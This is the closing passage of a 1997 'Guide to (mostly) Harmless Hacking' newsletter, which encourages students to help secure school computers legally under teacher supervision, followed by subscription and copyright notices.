You may also have a problem with school administrators who may feel that it is inconvenient to set up such a secure system. They will have to give up the use of lots of convenient programs. Upgrading to WinNT will cost money. Try explaining to them how much easier it will be to keep those wannbe hacker vandals from trashing the school computers or using them to visit bianca’s Smut Shack.
Are you ready to turn your hacking skills into a great reputation at school? Are you ready to have the computer lab teachers begging to learn from you? Are you ready to have the entire school computer system under your control -- legally? You will, of course, only use the tricks of this Guide under the supervision of an admiring teacher, right? It sure is more fun than expulsion and juvenile court!
___________________________________________________________
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
___________________________________________________________